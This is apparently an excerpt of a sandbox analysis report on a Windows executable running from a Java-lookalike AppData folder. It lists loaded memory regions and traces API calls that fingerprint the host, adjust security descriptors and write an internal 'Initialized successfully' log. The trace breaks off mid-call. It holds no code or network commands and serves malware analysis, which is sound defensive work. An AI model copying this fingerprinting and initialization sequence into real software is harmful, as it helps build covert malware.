region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 226 start_va = 0x7fff0000 end_va = 0x7ffd2ef5ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 227 start_va = 0x7ffd2ef60000 end_va = 0x7ffd2f121fff entry_point = 0x7ffd2ef60000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" Region: id = 228 start_va = 0x7ffd2f122000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffd2f122000" filename = "" Region: id = 229 start_va = 0xdd0000 end_va = 0xdd3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000dd0000" filename = "" Region: id = 230 start_va = 0xde0000 end_va = 0xde1fff entry_point = 0x0 region_type = private name = "private_0x0000000000de0000" filename = "" Region: id = 231 start_va = 0xf60000 end_va = 0xf6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f60000" filename = "" Region: id = 232 start_va = 0x64da0000 end_va = 0x64e12fff entry_point = 0x64db2f50 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" Region: id = 233 start_va = 0x64e20000 end_va = 0x64e6efff entry_point = 0x64e36ae0 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" Region: id = 234 start_va = 0xc40000 end_va = 0xc4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c40000" filename = "" Region: id = 235 start_va = 0xc50000 end_va = 0xc53fff entry_point = 0x0 region_type = private name = "private_0x0000000000c50000" filename = "" Region: id = 236 start_va = 0xdf0000 end_va = 0xeadfff entry_point = 0xdf0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" Region: id = 237 start_va = 0x1050000 end_va = 0x114ffff entry_point = 0x0 region_type = private name = "private_0x0000000001050000" filename = "" Region: id = 238 start_va = 0x64e70000 end_va = 0x64e77fff entry_point = 0x64e71460 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" Region: id = 239 start_va = 0x743d0000 end_va = 0x74460fff entry_point = 0x74410ab0 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" Region: id = 240 start_va = 0x76460000 end_va = 0x7654ffff entry_point = 0x764737d0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" Region: id = 241 start_va = 0x76fa0000 end_va = 0x77115fff entry_point = 0x7703c9a0 region_type = mapped_file name = "KernelBase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" Region: id = 242 start_va = 0x7e3f0000 end_va = 0x7e4effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e3f0000" filename = "" Region: id = 243 start_va = 0x11f0000 end_va = 0x127ffff entry_point = 0x0 region_type = private name = "private_0x00000000011f0000" filename = "" Region: id = 244 start_va = 0xeb0000 end_va = 0xeeffff entry_point = 0x0 region_type = private name = "private_0x0000000000eb0000" filename = "" Region: id = 245 start_va = 0x1280000 end_va = 0x137ffff entry_point = 0x0 region_type = private name = "private_0x0000000001280000" filename = "" Region: id = 246 start_va = 0x14c0000 end_va = 0x14cffff entry_point = 0x0 region_type = private name = "private_0x00000000014c0000" filename = "" Region: id = 247 start_va = 0x74470000 end_va = 0x744c8fff entry_point = 0x744a8cc0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" Region: id = 248 start_va = 0x744d0000 end_va = 0x744d9fff entry_point = 0x744d2aa0 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" Region: id = 249 start_va = 0x744e0000 end_va = 0x744fdfff entry_point = 0x744eb640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" Region: id = 250 start_va = 0x745a0000 end_va = 0x7465dfff entry_point = 0x745d5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" Region: id = 251 start_va = 0x75b70000 end_va = 0x75c1bfff entry_point = 0x75ba36b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" Region: id = 252 start_va = 0x76d70000 end_va = 0x76deafff entry_point = 0x76d8e3b0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" Region: id = 253 start_va = 0x76e90000 end_va = 0x76ed2fff entry_point = 0x76e9f570 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" Region: id = 254 start_va = 0x7e51a000 end_va = 0x7e51cfff entry_point = 0x0 region_type = private name = "private_0x000000007e51a000" filename = "" Region: id = 255 start_va = 0x14d0000 end_va = 0x1806fff entry_point = 0x14d0000 region_type = mapped_file name = "SortDefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" Region: id = 256 start_va = 0x74360000 end_va = 0x7438efff entry_point = 0x74379530 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" Region: id = 257 start_va = 0x74390000 end_va = 0x743aafff entry_point = 0x74399010 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" Region: id = 258 start_va = 0x743b0000 end_va = 0x743c2fff entry_point = 0x743b9500 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" Region: id = 259 start_va = 0xc60000 end_va = 0xc60fff entry_point = 0x0 region_type = private name = "private_0x0000000000c60000" filename = "" Region: id = 260 start_va = 0xef0000 end_va = 0xef0fff entry_point = 0x0 region_type = private name = "private_0x0000000000ef0000" filename = "" Region: id = 261 start_va = 0x1810000 end_va = 0x1997fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001810000" filename = "" Region: id = 262 start_va = 0x19a0000 end_va = 0x1b20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019a0000" filename = "" Region: id = 263 start_va = 0x1b30000 end_va = 0x2f2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b30000" filename = "" Region: id = 264 start_va = 0x74660000 end_va = 0x747acfff entry_point = 0x747125d0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" Region: id = 265 start_va = 0x75dd0000 end_va = 0x75f0ffff entry_point = 0x75de0280 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" Region: id = 266 start_va = 0x769c0000 end_va = 0x76adffff entry_point = 0x76a046e0 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" Region: id = 267 start_va = 0x76ae0000 end_va = 0x76b23fff entry_point = 0x76afd810 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" Region: id = 268 start_va = 0x77120000 end_va = 0x772d9fff entry_point = 0x771fcbb0 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" Region: id = 269 start_va = 0x77350000 end_va = 0x7737afff entry_point = 0x773552b0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" Region: id = 270 start_va = 0x747b0000 end_va = 0x75b6efff entry_point = 0x74969ea0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" Region: id = 271 start_va = 0x75f20000 end_va = 0x763fcfff entry_point = 0x76117460 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" Region: id = 272 start_va = 0x76df0000 end_va = 0x76e7cfff entry_point = 0x76e391a0 region_type = mapped_file name = "SHCore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" Region: id = 273 start_va = 0x76e80000 end_va = 0x76e8bfff entry_point = 0x76e83920 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" Region: id = 274 start_va = 0x77340000 end_va = 0x7734efff entry_point = 0x77342e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" Region: id = 275 start_va = 0x77380000 end_va = 0x773c3fff entry_point = 0x77387280 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" Region: id = 276 start_va = 0xf00000 end_va = 0xf00fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f00000" filename = "" Region: id = 277 start_va = 0x76800000 end_va = 0x768e9fff entry_point = 0x7683b990 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" Region: id = 278 start_va = 0x75f10000 end_va = 0x75f15fff entry_point = 0x75f11480 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\SysWOW64\\psapi.dll" Region: id = 279 start_va = 0x74350000 end_va = 0x74359fff entry_point = 0x74353200 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" Region: id = 280 start_va = 0x74320000 end_va = 0x74347fff entry_point = 0x74327880 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" Thread: id = 3 os_tid = 0xbcc [0058.233] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76460000 [0058.233] GetModuleHandleA (lpModuleName=0x0) returned 0xbd0000 [0058.234] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x773d0000 [0058.236] LoadLibraryA (lpLibFileName="NTDLL") returned 0x773d0000 [0058.236] GetProcAddress (hModule=0x773d0000, lpProcName="RtlAddVectoredExceptionHandler") returned 0x7742f090 [0058.236] RtlAddVectoredExceptionHandler (FirstHandler=0x1, VectoredHandler=0xbdb507) returned 0x1060b18 [0058.237] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x0 [0058.237] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76d70000 [0058.325] CryptAcquireContextW (in: phProv=0xbefe94, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xbefe94*=0x105e098) returned 1 [0058.348] LoadLibraryA (lpLibFileName="NTDLL") returned 0x773d0000 [0058.349] GetProcAddress (hModule=0x773d0000, lpProcName="RtlInitializeCriticalSection") returned 0x774295f0 [0058.350] GetModuleHandleA (lpModuleName="shlwapi.dll") returned 0x0 [0058.350] LoadLibraryA (lpLibFileName="shlwapi.dll") returned 0x76ae0000 [0058.432] wvnsprintfW (in: pszDest=0xdcf808, cchDest=6, pszFmt="%02X", arglist=0xdcf7e4 | out: pszDest="FE") returned 2 [0058.433] wvnsprintfW (in: pszDest=0xdcf808, cchDest=6, pszFmt="%02X", arglist=0xdcf7e4 | out: pszDest="00") returned 2 [0058.433] wvnsprintfW (in: pszDest=0xdcf808, cchDest=6, pszFmt="%02X", arglist=0xdcf7e4 | out: pszDest="00") returned 2 [0058.433] wvnsprintfW (in: pszDest=0xdcf808, cchDest=6, pszFmt="%02X", arglist=0xdcf7e4 | out: pszDest="00") returned 2 [0058.433] wvnsprintfW (in: pszDest=0xdcf808, cchDest=6, pszFmt="%02X", arglist=0xdcf7e4 | out: pszDest="69") returned 2 [0058.433] wvnsprintfW (in: pszDest=0xdcf808, cchDest=6, pszFmt="%02X", arglist=0xdcf7e4 | out: pszDest="97") returned 2 [0058.433] wvnsprintfW (in: pszDest=0xdcf808, cchDest=6, pszFmt="%02X", arglist=0xdcf7e4 | out: pszDest="65") returned 2 [0058.433] wvnsprintfW (in: pszDest=0xdcf808, cchDest=6, pszFmt="%02X", arglist=0xdcf7e4 | out: pszDest="EA") returned 2 [0058.433] wvnsprintfW (in: pszDest=0xdcf808, cchDest=6, pszFmt="%02X", arglist=0xdcf7e4 | out: pszDest="38") returned 2 [0058.433] wvnsprintfW (in: pszDest=0xdcf808, cchDest=6, pszFmt="%02X", arglist=0xdcf7e4 | out: pszDest="17") returned 2 [0058.433] wvnsprintfW (in: pszDest=0xdcf808, cchDest=6, pszFmt="%02X", arglist=0xdcf7e4 | out: pszDest="50") returned 2 [0058.434] wvnsprintfW (in: pszDest=0xdcf808, cchDest=6, pszFmt="%02X", arglist=0xdcf7e4 | out: pszDest="90") returned 2 [0058.434] wvnsprintfW (in: pszDest=0xdcf808, cchDest=6, pszFmt="%02X", arglist=0xdcf7e4 | out: pszDest="34") returned 2 [0058.434] wvnsprintfW (in: pszDest=0xdcf808, cchDest=6, pszFmt="%02X", arglist=0xdcf7e4 | out: pszDest="0B") returned 2 [0058.434] wvnsprintfW (in: pszDest=0xdcf808, cchDest=6, pszFmt="%02X", arglist=0xdcf7e4 | out: pszDest="EF") returned 2 [0058.434] wvnsprintfW (in: pszDest=0xdcf808, cchDest=6, pszFmt="%02X", arglist=0xdcf7e4 | out: pszDest="D5") returned 2 [0058.435] GetComputerNameW (in: lpBuffer=0xdcf77c, nSize=0xdcf734 | out: lpBuffer="7ZA1P8WI", nSize=0xdcf734) returned 1 [0058.436] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x1, phkResult=0xdcf6f0 | out: phkResult=0xdcf6f0*=0x138) returned 0x0 [0058.436] RegQueryValueExW (in: hKey=0x138, lpValueName="InstallDate", lpReserved=0x0, lpType=0xdcf710, lpData=0xdcf714, lpcbData=0xdcf708*=0x4 | out: lpType=0xdcf710*=0x4, lpData=0xdcf714*=0x0, lpcbData=0xdcf708*=0x4) returned 0x0 [0058.437] RegCloseKey (hKey=0x138) returned 0x0 [0058.437] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x1, phkResult=0xdcf710 | out: phkResult=0xdcf710*=0x138) returned 0x0 [0058.437] RegQueryValueExW (in: hKey=0x138, lpValueName="DigitalProductId", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xdcf720*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0xdcf720*=0x0) returned 0x2 [0058.437] RegCloseKey (hKey=0x138) returned 0x0 [0058.437] GetVersionExW (in: lpVersionInformation=0xdcf7f8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xdcf7f8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0058.438] GlobalMemoryStatusEx (in: lpBuffer=0xdcf958 | out: lpBuffer=0xdcf958) returned 1 [0058.438] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0xdcf928, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0xdcf928*=0x30565e9e, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0058.438] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0xdcf1a4 | out: Wow64Process=0xdcf1a4) returned 1 [0058.439] InitializeSecurityDescriptor (in: pSecurityDescriptor=0xbee8a8, dwRevision=0x1 | out: pSecurityDescriptor=0xbee8a8) returned 1 [0058.439] SetSecurityDescriptorDacl (in: pSecurityDescriptor=0xbee8a8, bDaclPresent=1, pDacl=0x0, bDaclDefaulted=0 | out: pSecurityDescriptor=0xbee8a8) returned 1 [0058.439] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0058.457] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x10607c0, lpbSaclPresent=0xdcf1a8, pSacl=0xdcf1a0, lpbSaclDefaulted=0xdcf1a4 | out: lpbSaclPresent=0xdcf1a8, pSacl=0xdcf1a0, lpbSaclDefaulted=0xdcf1a4) returned 1 [0058.457] SetSecurityDescriptorSacl (in: pSecurityDescriptor=0xbee8a8, bSaclPresent=1, pSacl=0x10607d4, bSaclDefaulted=0 | out: pSecurityDescriptor=0xbee8a8) returned 1 [0058.458] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x0 [0058.458] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x747b0000 [0058.517] SHGetFolderPathW (in: hwnd=0x0, csidl=36, hToken=0x0, dwFlags=0x0, pszPath=0xdcefa4 | out: pszPath="C:\\Windows") returned 0x0 [0058.522] PathAddBackslashW (in: pszPath="C:\\Windows" | out: pszPath="C:\\Windows\\") returned="" [0058.522] GetVolumeNameForVolumeMountPointW (in: lpszVolumeMountPoint="C:\\Windows\\", lpszVolumeName=0xdceedc, cchBufferLength=0x64 | out: lpszVolumeName="") returned 0 [0058.524] PathRemoveBackslashW (in: pszPath="C:\\Windows\\" | out: pszPath="C:\\Windows") returned="" [0058.524] PathRemoveFileSpecW (in: pszPath="C:\\Windows" | out: pszPath="C:\\") returned 1 [0058.524] PathAddBackslashW (in: pszPath="C:\\" | out: pszPath="C:\\") returned="" [0058.552] GetVolumeNameForVolumeMountPointW (in: lpszVolumeMountPoint="C:\\", lpszVolumeName=0xdceedc, cchBufferLength=0x64 | out: lpszVolumeName="\\\\?\\Volume{2bd2c9f3-0000-0000-0000-100000000000}\\") returned 1 [0058.553] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x0 [0058.553] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x76800000 [0058.561] LoadLibraryA (lpLibFileName="api-ms-win-core-com-l1-1-0") returned 0x77120000 [0058.562] GetProcAddress (hModule=0x77120000, lpProcName="CLSIDFromString") returned 0x771d1390 [0058.562] CLSIDFromString (in: lpsz="{2bd2c9f3-0000-0000-0000-100000000000}", pclsid=0xbeeadc | out: pclsid=0xbeeadc*(Data1=0x2bd2c9f3, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x10, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x0 [0058.562] GetVersionExW (in: lpVersionInformation=0xdcf08c*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x10607d4, dwMinorVersion=0x10607c0, dwBuildNumber=0xdcf0d8, dwPlatformId=0xdcf0ac, szCSDVersion="") | out: lpVersionInformation=0xdcf08c*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0058.562] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20008, TokenHandle=0xdcf1a4 | out: TokenHandle=0xdcf1a4*=0x1dc) returned 1 [0058.563] GetTokenInformation (in: TokenHandle=0x1dc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xdcf1a8 | out: TokenInformation=0x0, ReturnLength=0xdcf1a8) returned 0 [0058.563] GetLastError () returned 0x7a [0058.563] GetTokenInformation (in: TokenHandle=0x1dc, TokenInformationClass=0x19, TokenInformation=0x126f5a8, TokenInformationLength=0x14, ReturnLength=0xdcf1a8 | out: TokenInformation=0x126f5a8, ReturnLength=0xdcf1a8) returned 1 [0058.563] GetSidSubAuthorityCount (pSid=0x126f5b0) returned 0x126f5b1 [0058.563] GetSidSubAuthority (pSid=0x126f5b0, nSubAuthority=0x0) returned 0x126f5b8 [0058.563] CloseHandle (hObject=0x1dc) returned 1 [0058.564] CreateEventW (lpEventAttributes=0xbee89c, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x1dc [0058.564] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0xdcfa58 | out: TokenHandle=0xdcfa58*=0x1e0) returned 1 [0058.564] GetTokenInformation (in: TokenHandle=0x1e0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xdcfa44 | out: TokenInformation=0x0, ReturnLength=0xdcfa44) returned 0 [0058.564] GetLastError () returned 0x7a [0058.564] GetTokenInformation (in: TokenHandle=0x1e0, TokenInformationClass=0x1, TokenInformation=0x126f5a8, TokenInformationLength=0x24, ReturnLength=0xdcfa44 | out: TokenInformation=0x126f5a8, ReturnLength=0xdcfa44) returned 1 [0058.564] GetTokenInformation (in: TokenHandle=0x1e0, TokenInformationClass=0xc, TokenInformation=0xbee83c, TokenInformationLength=0x4, ReturnLength=0xdcfa5c | out: TokenInformation=0xbee83c, ReturnLength=0xdcfa5c) returned 1 [0058.564] CloseHandle (hObject=0x1e0) returned 1 [0058.564] GetLengthSid (pSid=0x126f5b0) returned 0x1c [0058.564] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0xbee8c8 | out: pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming") returned 0x0 [0058.567] PathRemoveBackslashW (in: pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming" | out: pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming") returned="g" [0058.567] GetCurrentProcess () returned 0xffffffff [0058.568] GetModuleHandleA (lpModuleName="psapi.dll") returned 0x0 [0058.568] LoadLibraryA (lpLibFileName="psapi.dll") returned 0x75f10000 [0058.597] GetModuleFileNameExW (in: hProcess=0xffffffff, hModule=0x0, lpFilename=0xdcf85c, nSize=0x104 | out: lpFilename="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe") returned 0x40 [0058.598] GetCurrentProcessId () returned 0x84 [0058.598] wvnsprintfW (in: pszDest=0xdcf7b0, cchDest=6, pszFmt="%02X", arglist=0xdcf78c | out: pszDest="A2") returned 2 [0058.598] wvnsprintfW (in: pszDest=0xdcf7b0, cchDest=6, pszFmt="%02X", arglist=0xdcf78c | out: pszDest="00") returned 2 [0058.598] wvnsprintfW (in: pszDest=0xdcf7b0, cchDest=6, pszFmt="%02X", arglist=0xdcf78c | out: pszDest="00") returned 2 [0058.598] wvnsprintfW (in: pszDest=0xdcf7b0, cchDest=6, pszFmt="%02X", arglist=0xdcf78c | out: pszDest="00") returned 2 [0058.599] wvnsprintfW (in: pszDest=0xdcf7b0, cchDest=6, pszFmt="%02X", arglist=0xdcf78c | out: pszDest="30") returned 2 [0058.599] wvnsprintfW (in: pszDest=0xdcf7b0, cchDest=6, pszFmt="%02X", arglist=0xdcf78c | out: pszDest="88") returned 2 [0058.599] wvnsprintfW (in: pszDest=0xdcf7b0, cchDest=6, pszFmt="%02X", arglist=0xdcf78c | out: pszDest="8B") returned 2 [0058.599] wvnsprintfW (in: pszDest=0xdcf7b0, cchDest=6, pszFmt="%02X", arglist=0xdcf78c | out: pszDest="FC") returned 2 [0058.599] wvnsprintfW (in: pszDest=0xdcf7b0, cchDest=6, pszFmt="%02X", arglist=0xdcf78c | out: pszDest="45") returned 2 [0058.599] wvnsprintfW (in: pszDest=0xdcf7b0, cchDest=6, pszFmt="%02X", arglist=0xdcf78c | out: pszDest="A1") returned 2 [0058.599] wvnsprintfW (in: pszDest=0xdcf7b0, cchDest=6, pszFmt="%02X", arglist=0xdcf78c | out: pszDest="90") returned 2 [0058.599] wvnsprintfW (in: pszDest=0xdcf7b0, cchDest=6, pszFmt="%02X", arglist=0xdcf78c | out: pszDest="7E") returned 2 [0058.599] wvnsprintfW (in: pszDest=0xdcf7b0, cchDest=6, pszFmt="%02X", arglist=0xdcf78c | out: pszDest="EF") returned 2 [0058.599] wvnsprintfW (in: pszDest=0xdcf7b0, cchDest=6, pszFmt="%02X", arglist=0xdcf78c | out: pszDest="C5") returned 2 [0058.600] wvnsprintfW (in: pszDest=0xdcf7b0, cchDest=6, pszFmt="%02X", arglist=0xdcf78c | out: pszDest="25") returned 2 [0058.600] wvnsprintfW (in: pszDest=0xdcf7b0, cchDest=6, pszFmt="%02X", arglist=0xdcf78c | out: pszDest="BC") returned 2 [0058.600] ConvertSidToStringSidW () returned 0x1 [0058.600] GetCommandLineW () returned="\"C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe\"" [0058.600] GetLastError () returned 0x0 [0058.600] GetLocalTime (in: lpSystemTime=0xdcfa18 | out: lpSystemTime=0xdcfa18*(wYear=0x7e0, wMonth=0xa, wDayOfWeek=0x4, wDay=0xd, wHour=0xf, wMinute=0x2a, wSecond=0x15, wMilliseconds=0xb)) [0058.601] GetCurrentThreadId () returned 0xbcc [0058.601] GetCurrentProcessId () returned 0x84 [0058.601] wvnsprintfW (in: pszDest=0x11f04a0, cchDest=250, pszFmt="[%02u.%02u.%4u %02u:%02u:%02u] ver=%u.%u.%u, log=0x%04X, PID=0x%04X, TID=0x%04X, LE=%u(0x%X)\r\n%S: ", arglist=0xdcf9bc | out: pszDest="[13.10.2016 15:42:21] ver=2.2.5, log=0x0000, PID=0x0084, TID=0x0BCC, LE=0(0x0)\r\nINFO: ") returned 86 [0058.601] wvnsprintfW (in: pszDest=0x11f054c, cchDest=1962, pszFmt="Initialized successfully:\r\nVersion: %u.%u.%u\r\nIntegrity level: %u\r\ncoreData.proccessFlags: 0x%08X\r\nFull path: %s\r\nCommand line: %s\r\nSID: %s\r\nbaseConfig hash=0x%08X\r\ncoreData.modules.current=0x%p\r\ncoreData.initFlags=0x%x", arglist=0xdcfa3c | out: pszDest="Initialized successfully:\r\nVersion: 2.2.5\r\nIntegrity level: 3\r\ncoreData.proccessFlags: 0x00000001\r\nFull path: C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe\r\nCommand line: \"C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe\"\r\nSID: S-1-5-21-3582695476-958571460-1978946630-1000\r\nbaseConfig hash=0x6BD73BCF\r\ncoreData.modules.current=0x00BD0000\r\ncoreData.initFlags=0x0") returned 397 [0058.601] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:42:21] ver=2.2.5, log=0x0000, PID=0x0084, TID=0x0BCC, LE=0(0x0)\r\nINFO: Initialized successfully:\r\nVersion: 2.2.5\r\nIntegrity level: 3\r\ncoreData.proccessFlags: 0x00000001\r\nFull path: C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe\r\nCommand line: \"C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe\"\r\nSID: S-1-5-21-3582695476-958571460-1978946630-1000\r\nbaseConfig hash=0x6BD73BCF\r\ncoreData.modules.current=0x00BD0000\r\ncoreData.initFlags=0x0", cchWideChar=483, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 483 [0058.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:42:21] ver=2.2.5, log=0x0000, PID=0x0084, TID=0x0BCC, LE=0(0x0)\r\nINFO: Initialized successfully:\r\nVersion: 2.2.5\r\nIntegrity level: 3\r\ncoreData.proccessFlags: 0x00000001\r\nFull path: C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe\r\nCommand line: \"C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe\"\r\nSID: S-1-5-21-3582695476-958571460-1978946630-1000\r\nbaseConfig hash=0x6BD73BCF\r\ncoreData.modules.current=0x00BD0000\r\ncoreData.initFlags=0x0", cchWideChar=483, lpMultiByteStr=0x126f830, cbMultiByte=484, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[13.10.2016 15:42:21] ver=2.2.5, log=0x0000, PID=0x0084, TID=0x0BCC, LE=0(0x0)\r\nINFO: Initialized successfully:\r\nVersion: 2.2.5\r\nIntegrity level: 3\r\ncoreData.proccessFlags: 0x00000001\r\nFull path: C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe\r\nCommand line: \"C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe\"\r\nSID: S-1-5-21-3582695476-958571460-1978946630-1000\r\nbaseConfig hash=0x6BD73BCF\r\ncoreData.modules.current=0x00BD0000\r\ncoreData.initFlags=0x0", lpUsedDefaultChar=0x0) returned 483 [0058.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:42:21] ver=2.2.5, log=0x0000, PID=0x0084, TID=0x0BCC, LE=0(0x0)\r\nINFO: Initialized successfully:\r\nVersion: 2.2.5\r\nIntegrity level: 3\r\ncoreData.proccessFlags: 0x00000001\r\nFull path: C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe\r\nCommand line: \"C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe\"\r\nSID: S-1-5-21-3582695476-958571460-1978946630-1000\r\nbaseConfig hash=0x6BD73BCF\r\ncoreData.modules.current=0x00BD0000\r\ncoreData.initFlags=0x0", cchWideChar=483, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 483 [0058.602] WideCharToMultiByte (in: 